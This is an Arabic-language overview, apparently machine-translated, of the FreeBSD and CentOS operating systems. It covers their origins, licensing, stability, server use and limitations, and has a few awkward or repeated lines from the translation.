يتمتع FreeBSD ، وهو سليل غير مباشر لـ AT&T UNIX عبر توزيع البرامج Berkeley (BSD) ، بتاريخ طويل ومضطرب يرجع تاريخه إلى عام 1993. على عكس توزيعات Linux ، والتي تم تعريفها على أنها حلول برامج متكاملة تتكون من Linux kernel وآلاف من تطبيقات البرامج ، FreeBSD هو نظام تشغيل متكامل بإحكام مبني من نواة BSD وما يسمى بـ "userland" (وبالتالي يمكن استخدامه حتى بدون تطبيقات إضافية). يتم فقد هذا التمييز إلى حد كبير بمجرد تثبيته على نظام كمبيوتر متوسط ​​- مثل العديد من توزيعات Linux ، تتوفر مجموعة كبيرة من التطبيقات مفتوحة المصدر (غالبًا) لتوسيع نطاق FreeBSD ، ولكن يتم توفيرها عادةً بواسطة مساهمين من جهات خارجية و ليست بدقة جزء من فري.

طورت FreeBSD سمعة كونها نظام تشغيل سريع وعالي الأداء ومستقر للغاية ، ومناسب بشكل خاص لخدمة الويب والمهام المماثلة. قامت العديد من محركات البحث على الويب والمؤسسات الكبيرة ذات البنية التحتية للحوسبة المهمة ، بنشر واستخدام FreeBSD على أنظمة الكمبيوتر الخاصة بهم لسنوات. مقارنةً بنظام Linux ، يتم توزيع FreeBSD بموجب ترخيص أقل تقييدًا ، مما يسمح بإعادة الاستخدام غير المقيد فعليًا وتعديل شفرة المصدر لأي غرض. حتى أجزاء ماك من Apple معروفة أنها مشتقة من FreeBSD. إلى جانب نظام التشغيل الأساسي ، يوفر المشروع أيضًا أكثر من 24000 تطبيق برمجي (يُسمى المنافذ) في نماذج ثنائية وكود مصدر للتثبيت السهل أعلى FreeBSD الأساسي.

FreeBSD لديه دعم أصلي لنظام الملفات ZFS المتقدم ويدعم كلاً من اللقطات وبيئات التمهيد. هذا يسمح لمستخدمي FreeBSD بحماية بياناتهم والتغييرات في نظام التشغيل.

بينما يمكن استخدام FreeBSD بالتأكيد كنظام تشغيل لسطح المكتب ، إلا أنه لا يتناسب بشكل جيد مع توزيعات Linux الشائعة في هذا القسم. يقدم مثبت نظام وضع النص القليل فيما يتعلق باكتشاف الأجهزة أو تكوين النظام ، مما يترك الكثير من العمل القذر للمستخدم في إعداد ما بعد التثبيت. فيما يتعلق بدعم الأجهزة الحديثة ، يتخلف FreeBSD عمومًا عن نظام Linux ، وخاصة في دعم الأدوات المكتبية وأجهزة الكمبيوتر المحمول المتطورة ، مثل بطاقات الشبكة اللاسلكية أو الكاميرات الرقمية. يجب على هؤلاء المستخدمين الذين يسعون لاستغلال سرعة وثبات FreeBSD على سطح المكتب أو محطة العمل النظر في أحد مشاريع FreeBSD المتوفرة على سطح المكتب ، بدلاً من FreeBSD نفسه

تم إطلاق CentOS في أواخر عام 2003

تم إطلاق CentOS في أواخر عام 2003



تم إطلاق CentOS في أواخر عام 2003 ، وهو مشروع مجتمعي يهدف إلى إعادة بناء الكود المصدري لـ Red Hat Enterprise Linux (RHEL) إلى توزيع Linux قابل للتثبيت وتوفير تحديثات الأمان في الوقت المناسب لجميع حزم البرامج المضمنة. لوضع أكثر صراحة ، CentOS هو استنساخ RHEL. الفرق الفني الوحيد بين التوزيعتين هو العلامة التجارية - CentOS تستبدل جميع العلامات التجارية والشعارات من Red Hat بعلاماتها الخاصة. ومع ذلك ، فإن العلاقات بين Red Hat و CentOS تظل ودية وأن العديد من مطوري CentOS على اتصال نشط مع Red Hat أو حتى يستخدمونها مباشرة.

غالبًا ما يتم اعتبار CentOS بمثابة توزيع خادم موثوق. يأتي مع نفس المجموعة من حزم نواة Linux وحزم البرامج التي تم اختبارها جيدًا ومستقرة والتي تشكل أساسًا لوالده ، Red Hat Enterprise Linux. على الرغم من كونه مشروعًا مجتمعيًا يديره متطوعون ، إلا أنه اكتسب شهرة لكونه بديلًا قويًا ومجانيًا لمنتجات الخوادم الأكثر تكلفة في السوق ، لا سيما بين مسؤولي نظام Linux ذوي الخبرة. تعتبر CentOS مناسبة أيضًا كحل مكتبي للمؤسسات ، خاصةً حيث يُفضل الاستقرار والموثوقية والدعم طويل المدى على أحدث البرامج والميزات. مثل RHEL ، يتم دعم CentOS مع حوالي 7-10 سنوات من تحديثات الأمان.

على الرغم من ميزاته ، قد لا يكون CentOS هو الحل الأفضل في جميع سيناريوهات النشر. يجب على المستخدمين الذين يفضلون التوزيع باستخدام أحدث تقنيات Linux وأحدث حزم البرامج البحث في مكان آخر. لا يتم إصدار إصدارات CentOS الرئيسية ، التي تتبع إصدار RHEL ، إلا كل سنتين إلى ثلاث سنوات ، بينما تميل الإصدارات "نقطة" (على سبيل المثال 5.1) إلى الوصول إلى فترات زمنية تتراوح بين 9 و 12 شهرًا. لا تحتوي إصدارات النقاط عادةً على أي ميزات رئيسية (على الرغم من أنها تتضمن أحيانًا دعمًا لأجهزة أحدث) وقد يتم تحديث عدد قليل فقط من حزم البرامج إلى إصدارات أحدث. تظل Linux kernel ، والنظام الأساسي ومعظم إصدارات التطبيقات على حالها ، لكن في بعض الأحيان قد يتم توفير إصدار أحدث من حزمة برامج مهمة (مثل LibreOffice أو Firefox) على أساس تجريبي. كمشروع جانبي ، تقوم CentOS أيضًا بإنشاء حزم محدثة لمستخدمي توزيعاتها ، ولكن المستودعات التي تحتوي عليها لا يتم تمكينها افتراضيًا لأنها قد تنقطع عن التوافق الرئيسي